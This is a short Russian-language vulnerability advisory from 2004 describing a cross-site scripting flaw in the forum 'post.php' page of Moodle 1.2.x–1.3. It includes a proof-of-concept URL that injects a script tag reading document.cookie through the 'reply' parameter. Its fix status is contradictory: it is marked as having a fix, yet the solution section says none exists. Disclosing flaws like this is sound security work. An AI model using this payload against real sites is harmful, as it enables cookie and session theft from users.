Межсайтовый скриптинг в Moodle в 'post.php'

Дата публикации:
08.08.2004
Всего просмотров:
1040
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Обход ограничений безопасности
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Moodle 1.2.x
Moodle 1.3.x
Уязвимые версии: Moodle до версии 1.3

Описание: Уязвимость в Moodle в 'post.php' позволяет удаленному пользователю выполнить XSS нападение.

Пример/Эксплоит:

http://[target]/moodle/mod/forum/post.php?reply=%3Cscript%3Ealert(document.cookie);%3C /script%3E

URL производителя: http://moodle.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: xss in moodle (post.php)

или введите имя

CAPTCHA